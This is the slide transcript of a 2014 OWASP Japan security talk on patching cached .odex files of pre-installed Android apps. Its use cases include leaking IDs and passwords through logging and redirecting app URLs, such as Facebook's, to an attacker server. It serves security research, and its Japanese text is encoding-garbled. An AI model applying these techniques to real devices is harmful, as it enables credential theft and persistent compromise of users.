Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Pre-installed Android application poisoning #ap...

OWASP Japan
March 20, 2014
860

Pre-installed Android application poisoning #appsecapac2014

OWASP Japan

March 20, 2014
Tweet

Transcript

  1. Whoami • Yoshitaka Kato/Ճ౻ ٛొ • ೔ຊHP ΤϯλʔϓϥΠζαʔϏεຊ෦ɹγχΞηΩϡϦςΟίϯαϧλϯτ • Hewlett-packard

    Japan, Senior Security Consultant, Enterprise Security Services ! • APJ஍ҬͰͷΠϯγσϯτϨεϙϯεαʔϏε΍ϖωτϨʔγϣϯςεταʔϏε Λ୲౰ɻ • In charge of Incident Response services and penetration testing services in APJ region. ! • ϓϥΠϕʔτͰ͸εϚϑΥΞϓϦΛ͍͍ͬͯ͡·͢ɻ • Smartphone application geek in personal life ! • CTF΋޷͖Ͱ͢ɻ/ CTF Player Preinstalled Android Application Poisoning 2
  2. Agenda • ֓ཁ / Overview • ংষ / Prologue •

    ৽͍͠ϋοΩϯάख๏ͷ঺հ /Introduction of new hacking practice • Pre-Installed application poisoning 3 Preinstalled Android Application Poisoning
  3. Overview • AndroidΞϓϦέʔγϣϯͷ৽͍͠վ͟Μख๏ͷ঺հ • New manipulation technic for builded Android

    application. • ͦͷख๏Λར༻ͨ͠ΞϓϦղੳख๏ɺ߈ܸख๏ (Application poisoning)ͷ঺հ • New analysis and attack technics using this technic.(Application poisoning) 4 Preinstalled Android Application Poisoning
  4. ͳͥϋοΧʔ͸AndroidΞϓϦΛվ͟Μ͢Δͷ͔ʁ Why do we analyze/manipulate builded Android application? • ηΩϡϦςΟௐࠪͷͨΊ

    / For security research. • ࢖͍উख޲্ͷͨΊ / For improvement of usability. • ߈ܸͷͨΊʢ΢ΠϧεΞϓϦͷ࡞੒ʣ / For attacks. (e.g. Trojan) • ͦͷଞ / Other 6 Preinstalled Android Application Poisoning Prologue
  5. APKϑΝΠϧͷೖख Obtaining .apk file ͜ͷաఔͰ࢖༻͢Δπʔϧ/necessary tools in these steps -

    apktool(smali, baksmali) - AXMLparser - ddx - dex2jar - jad,jd - keytool/jarsigner : ݱঢ়ͷAndroidΞϓϦվ͟Μεςοϓ The present common manipulation steps 7 Preinstalled Android Application Poisoning Prologue APKϑΝΠϧͷల։ Extracting .apk file σίϯύΠϧ De-compile վ͟Μ Manipulation apkϑΝΠϧʹύοΫ Pack in .apk file APKϑΝΠϧʹॺ໊ Sign to .apk file ΞϯΠϯετʔϧɺ Πϯετʔϧ uninstall, install
  6. ͳͥվ͟Μʹ͸͜Μͳʹଟ͘ͷεςοϓ͕ඞཁͳͷ͔ʁ Why do we need to do such a so

    many steps? -apkϑΝΠϧͷߏ଄͸ͪΐͬͱෳࡶ -apk file structure is a bit complicated ࣮ߦόΠφϦɻվ͟Μ͢ΔͨΊʹsmaliͰల։͕ඞཁ /binary, it needs to be extract by smali for manipulation ѹॖ͞Ε͍ͯΔ/compressed ॺ໊͞Ε͍ͯΔ/signed Τϯίʔυ͞Ε͍ͯΔ/encoded 8 Preinstalled Android Application Poisoning Prologue
  7. dexϑΝΠϧͱ͸? dex file? .dex file.... Compiled Android application code file.

    Android programs are compiled into .dex (Dalvik Executable) files, which are in turn zipped into a single .apk file on the device. .dex files can be created by automatically translating compiled applications written in the Java programming language. http://developer.android.com/guide/appendix/glossary.html http://www.scriptol.com/programming/dalvik.php 9 Preinstalled Android Application Poisoning Prologue
  8. • ͱʹ͔͘εςοϓ͕ଟͯ͘໘౗͍͘͞ɻπʔϧ΋େਿɻ • Troublesome. so many steps, so many tools.

    • baksmali(smaliܗ͔ࣜΒdexϑΝΠϧ΁ͷม׵)͕Αࣦ͘ഊ͢Δ • baksmali(convert smali format to dex file) often fails. • ϓϦΠϯετʔϧΞϓϦ͸ΞϯΠϯετʔϧͰ͖ͳ͍ͷͰɺஔ͖׵͑Ͱ͖ͳ͍ • Pre-install applications can’t be replaced to manipulated apps because it’s not uninstallable. • ࠶ॺ໊ʹΑΓɺॺ໊͕มߋ͞Εͯ͠·͏ɻ • Original signature would be changed by re-sign. ݱঢ়ͷAndroidΞϓϦվ͟Μख๏ͷ՝୊ Problems for the present common manipulation technic 10 Preinstalled Android Application Poisoning Prologue
  9. • Android Manifest.xmlͰఆٛͰ͖ΔηΩϡϦςΟϨϕϧ • Security model which can be defined

    in AndroidManifest.xml • ॺ໊ʹΑΔηΩϡϦςΟϞσϧʹΑΓɺΞϓϦؒͷΞΫηεʢ࿈ܞʣ੍ݶΛߦ͏͜ͱ ͕Մೳɻ • This security model can restrict access(combination) between applications. • ॺ໊͕มߋ͞Εͯ͠·͏ͱΞϓϦؒͷΞΫηγϏϦςΟΛࣦ͍ɺͦͷػೳ͕ར༻Ͱ͖ ͳ͍έʔε͕͋Γ • If a signature would be changed, an application may lose accessibility to another application. ॺ໊ʹΑΔηΩϡϦςΟϞσϧ Security model by signature 11 Preinstalled Android Application Poisoning Prologue
  10. • ͱʹ͔͘εςοϓ͕ଟͯ͘໘౗͍͘͞ɻπʔϧ΋େਿɻ • Troublesome. so many steps, so many tools.

    • baksmali(smaliܗ͔ࣜΒdexϑΝΠϧ΁ͷม׵)͕Αࣦ͘ഊ͢Δ • baksmali(convert smali format to dex file) often fails. • ϓϦΠϯετʔϧΞϓϦ͸ΞϯΠϯετʔϧͰ͖ͳ͍ͷͰɺஔ͖׵͑Ͱ͖ͳ͍ • Pre-install applications can’t be replaced to manipulated apps because it’s not uninstallable. • ࠶ॺ໊ʹΑΓɺॺ໊͕มߋ͞Εͯ͠·͏ɻ • Original signature would be changed by re-sign. ݱঢ়ͷAndroidΞϓϦվ͟Μख๏ͷ՝୊ Problems for the present common manipulation technic 12 Preinstalled Android Application Poisoning Prologue
  11. ֓ཁ/Overview • ৽͍͠ख๏ʢগͳ͘ͱ΋WebͰ͸ݟͳ͍ʣ • New approach, I’ve never seen on

    web at least. • rootԽඞਢʂʂͰ΋ϋοΧʔʹ͸Կͷ໰୊΋ͳ͍ɺΑͶʁ • root must be needed!! But it doesn’t matter for hackers, don’t it? • Android୺຤্ͷ࣮ߦόΠφϦͷΩϟογϡʢ.odexʣΛ௚઀վ͟Μ͢Δख๏ • The technic it to manipulate cached binary(.odex) on Android directly. 14 Preinstalled Android Application Poisoning Practice
  12. Odex? In short, an odex file is an optimized version

    of a classes.dex file that has optimizations that are device specific. http://code.google.com/p/smali/wiki/DeodexInstructions 15 Preinstalled Android Application Poisoning Practice dex install odex odex odex
  13. Where is Odexʁ • /system/app/ or /data/dalvik-cache/ • γεςϜΞϓϦ͸લऀ·ͨ͸ޙऀʹɺϢʔβʔΞϓϦ͸ޙऀʹ͋Δ •

    system applications including preinstalled applications exist both, user application exit latter • ࠓճͷλʔήοτ͸ޙऀ / In this presentation, The target is latter place. 16 Preinstalled Android Application Poisoning Practice
  14. .dexͷߏ଄ .dex file format http://source.android.com/devices/tech/dalvik/dex-format.html odex͸एׯҟͳΔ͕ɺυΩϡϝ ϯτԽ͞Ε͍ͯͳ͍ͬΆ͍ʢ୭ ͔஌Βͳ͍ʁʣ odex file

    format is a bit different to dex format, and It might be not documented. (Does anybody know it ?) 17 Preinstalled Android Application Poisoning Practice
  15. odexϑΝΠϧͷվ͟Μख๏ odex manipulation technic • ࢖༻͢Δπʔϧ - dexdump͚ͩʂʂ • tool

    - dexdump only. • dexdump͸Android SDKʹؚ·ΕΔπʔϧ • dexdump is included in Android SDK. • objdumpΈ͍ͨͳπʔϧ • it’s like a objdump. 18 Practice Preinstalled Android Application Poisoning
  16. վ͟Μͷεςοϓ manipulation steps 1.odexΛऔಘ 1.obtaining odex file 2.dexdumpʹͯվ͟Μ 2.manipulation by

    dexdump 2-1.վ͟Μ͢ΔՕॴΛಛఆ 2-1.Identify the place for manipulation 2-2.վ͟ΜʢόΠφϦύονϯάʣ 2-2.Manipulation.(binary patching) 2-3.νΣοΫαϜΛ࠶ܭࢉ (*optional) 2-3.Re-calculate checksum ! 3.Android ্ͷϑΝΠϧʹ্ॻ͖ίϐʔʢΠϯετʔϧͰ͸ͳ ͘ʣ 3.Overwrite copy to Android. 4.࠶ىಈ/reboot 21 Preinstalled Android Application Poisoning Practice
  17. Checksum • dex΍odexϑΝΠϧͷϔομʔʹ͸νΣοΫαϜ͕͋Δʢ༻్ෆ໌ɺAdler-32ʣ • dex/odex file has its checksum in

    header.(usage unknown, Adler-32) ! ! ! ! • dexdump͕νΣοΫαϜΛ࠶ܭࢉͯ͘͠ΕΔͷͰɺͦͷ஋Λ্ॻ͖͢Ε͹OK • dexdump can calculate checksum after manipulation, it should be OK to overwrite it. 22 Preinstalled Android Application Poisoning Practice
  18. Demonstration • ϙοϓΞοϓ͕දࣔ͞Εͯऴྃͯ͠͠·͏ΞϓϦέʔγϣϯ • The application which show a popup

    dialog and exit immediately. • վ͟Μͯ͠ɺϙοϓΞοϓ͕දࣔ͞Εͳ͍(ऴྃ͠ͳ͍)Α͏ʹ͢Δɻ • Avoid popup and exit by manipulation. 23 Preinstalled Android Application Poisoning Practice
  19. վ͟Μͷεςοϓ(again) manipulation steps 1.odexΛऔಘ 1.obtaining odex file 2.dexdumpʹͯվ͟Μ 2.manipulation by

    dexdump 2-1.վ͟Μ͢ΔՕॴΛಛఆ 2-1.Identify the place for manipulation 2-2.վ͟ΜʢόΠφϦύονϯάʣ 2-2.Manipulation.(binary patching) 2-3.νΣοΫαϜΛ࠶ܭࢉ (*optional) 2-3.Re-calculate checksum ! 3.Android ্ͷϑΝΠϧʹ্ॻ͖ίϐʔʢΠϯετʔϧͰ͸ͳ ͘ʣ 3.Overwrite copy to Android. 4.࠶ىಈ/reboot 24 Preinstalled Android Application Poisoning Practice
  20. ར఺/advantage • ؆୯!! / easier • ॺ໊͕มߋ͞Εͳ͍ • The signature

    is not changed. • dalvik-cache্ͷodexϑΝΠϧΛ࡟আ͢Δ͜ͱͰɺ؆ ୯ʹݩͷঢ়ଶʹ໭ͤΔɻʢodex͕࠶ੜ੒͞ΕΔʣ • Easily rollback by deleting odex file on dalvik- cache.(odex would be re-generate) 25 Preinstalled Android Application Poisoning Practice
  21. ख๏ʹ໊લΛ͚ͭͨ / name this technic ... Installed application poisoning 26

    Preinstalled Android Application Poisoning Practice
  22. ͜ͷख๏Λ࢖ͬͨղੳํ๏ɹͦͷ̍ practical use case part 1 • ΞϓϦέʔγϣϯΛಈతղੳ͢ΔࡍɺϩάΛ͸͔ͤΔͱղੳͷޮ཰্͕͕Δɻ • For

    a dynamic analysis of application, Log output would be effective. • ΞϓϦέʔγϣϯʹ͸σόοά༻ͷϩάΫϥε͕࢒͍ͬͯΔ͜ͱ͕ଟ͍ɻ • Logging functionality would be exist in a lot of released application. • ͦΕΛѱ༻͢Δɻ • Then, abuse it. 28 Preinstalled Android Application Poisoning Use case
  23. Α͋͘Δϩάग़ྗΫϥε / Common Log class Debug FlagʹΑͬͯग़ྗΛίϯτϩʔϧ ͍ͯ͠Δ/ Log output

    is controlled by debug flag ̏ͭͷϩάग़ྗؔ਺/ Three log output functions 29 Preinstalled Android Application Poisoning Use case
  24. Flag manipulation ϩάΫϥεͷdexdump / dexdump of log class 30 Use

    case Preinstalled Android Application Poisoning want to change it to 1
  25. 33 Use case Practical use case 2 ࠶౓Α͋͘Δϩάग़ྗΫϥε / Common

    Log class again Error log͚ͩ͸Debug flagͱ ؔ܎ͳ͘ग़ྗ͞ΕΔ Error log would be outputted regardless of Debug flag Preinstalled Android Application Poisoning
  26. 34 Preinstalled Android Application Poisoning Use case Function pointer manipulation

    ϩάؔ਺Λcall͢ΔΫϥεͷdexdump / dexdump of the class that call log functions Function pointer. it can be changed to arbitrary function
  27. 37 Preinstalled Android Application Poisoning Use case Practical use case

    3 Functionality manipulation some email application
  28. 38 Preinstalled Android Application Poisoning Use case dexdump for try

    - exception flow normal case Return to invoker
  29. 39 Preinstalled Android Application Poisoning Use case dexdump for try

    - exception flow exception case exception occurred exception occurred Return to invoker
  30. 40 Preinstalled Android Application Poisoning Use case ͜͜Ͱͪΐͬͱߟ͑ͨ/Then I thought..

    • exception۟ͷதͷLogؔ਺Λ࢖ͬͯɺσʔλʢ͜ͷ৔߹ɺύεϫʔυͱIDʣΛϩ άग़ྗͰ͖ͳ͍ͩΖ͏͔ʁ • Can we output datas(in this case, ID and Password) using Log function in exception? - exception࣌ͷॲཧΛਖ਼ৗܥͰ΋ͤͯ͞ - The process for exception would be done in normal case, - Logؔ਺ͷҾ਺ʹσʔλΛ౉ͯ͠΍Ε͹ - Then, Give datas to arguments for Log function, ! • Ͱ͖Δ͔ʁɹCan we do this?
  31. 41 Preinstalled Android Application Poisoning Use case Return to invoker

    dexdump for try - exception flow manipulation 1
  32. • ΞϓϦ಺ͷจࣈྻΛվ͟Μ͢Δɻ • strings manipulation technic. • ΞϓϦ಺ͷจࣈྻʹ͸ΞϓϦ͕࢖༻͢ΔAPIͷURLؚ͕·Ε͍ͯΔ͜ͱ͕ଟ͍ • Many

    applications have URL strings which would be used for Web API. • URLͷจࣈྻΛվ͟Μ͠ɺຊདྷͱ͸ҟͳΔαʔόʹ઀ଓͤ͞Δ͜ͱͰ MITM(Man In The Middle)߈ܸΛ੒ཱͤ͞Δɻ • MITM(Man In The Middle) attack would be executed by be connected manipulated URL. 45 Preinstalled Android Application Poisoning Use case for attack Pre-installed application poisoning concept
  33. https://www.facebook.com/ https://www.facebook.com/ poisoned normal 46 Preinstalled Android Application Poisoning Pre-installed

    application poisoning overview Use case for attack https://www.facebook.com/ facebook application poisoned URL Attacker’s server
  34. • dex಺Ͱ͸จࣈྻ͕ιʔτ͞Εͨ഑ྻͱͯ͠อ࣋͞Εɺιʔτ่͕Εͯ͠·͏ͱΤ ϥʔͱͳͬͯ͠·͏ɻ • Strings have been hold with sorted

    in dex/odex, Then if sort would be corrupted, It would be error. ! ! • ͞Βʹؔ਺಺ͰจࣈྻΛ࢖༻͢Δࡍ͸ɺ഑ྻ൪߸Λࢦఆ͍ͯ͠ΔͨΊɺॻ͖׵͑ޙ࠶ ιʔτͯ͠͠·͏ͱશମ΁ͷมߋ͕ඞཁͱͳΔɻ • And also, A string is specified by sort number when function use it, so Re- sort after manipulation would not be a realistic approach 47 Preinstalled Android Application Poisoning Use case for attack Notice: Strings manipulation
  35. • վ͟Μ༻ͷΞϓϦΛ࡞ͬͯΈ·ͨ͠ɻͦͷ໊΋ʮStrings poisonerʯ • I made an application for manipulation,

    “Strings poisoner”. • վ͟Μʹ͸ύιίϯ͕ඞཁͳ͍ɻ • No need pc poisoning. • ΢ΠϧεΞϓϦͷಈ͖Λ૝ఆ͍ͯ͠·͢ɻ • Assuming Virus attraction. 48 Use case for attack Preinstalled Android Application Poisoning Demonstration
  36. 49 Use case for attack Preinstalled Android Application Poisoning Demonstration

    steps https://www.facebook.com/ https://www.facebooj.com/ poisoned normal https://www.facebook.com/ facebook application Attacker’s server, facebooj.com Strings Poisoner facebook facebooj ᶃ ᶄ ᶅ ᶆ ᶇ
  37. • ߈ܸΞϓϦΛΞϯΠϯετʔϧͯ͠΋߈ܸ͕ଓ͘ • still under attack if malicious application would

    be uninstalled. • unrootͯ͠΋ଓ͘ • still under attack if Android devices would be unrooted • ϓϦΠϯετʔϧΞϓϦ͸म෮Ͱ͖ͳ͍ɻ޻৔ग़ՙ࣌ʹ໭͞ͳ͍ͱɻ • Pre-install application can not be fixed because it’s not uninstallable. 50 Preinstalled Android Application Poisoning Use case for attack Pre-installed application poisoning point
  38. • ϑϥάͷվ͟Μ / Flag manipulation • ؔ਺ϙΠϯλͷվ͟Μ / Function pointer

    manipulation • ؔ਺ͷվ͟Μ / Functionality manipulation • จࣈྻͷվ͟Μ / Strings manipulation • จࣈྻͷϙΠϯλͷվ͟Μ΋Ͱ͖·͢ɻ/ Possibly Strings pointer manipulation 51 Preinstalled Android Application Poisoning Use case for attack Pre-installed application poisoning use case summary
  39. Pre-installed Android application poisoning ๏pros – ࠓ·ͰΑΓ؆୯ͳख๏ / easier technic.

    – ࢖͍ํʹΑͬͯ͸ղੳ΍߈ܸʹ࢖͑ΔϋοΧʔͷख๏ /Hacker’s technic for analysis(white hacker) or attack(black hacker). ๏cons – େ͖ͳվ͟Μ͸޲͔ͳ͍ / not suitable for big manipulation. – odex͸σόΠε͝ͱʹҟͳΔͷͰɺվ͟ΜՕॴ΍ํ๏͕ҟͳΔɻ/ odex is device specific file. manipulation target and method would be changed each odex file. 52 Preinstalled Android Application Poisoning Conclusion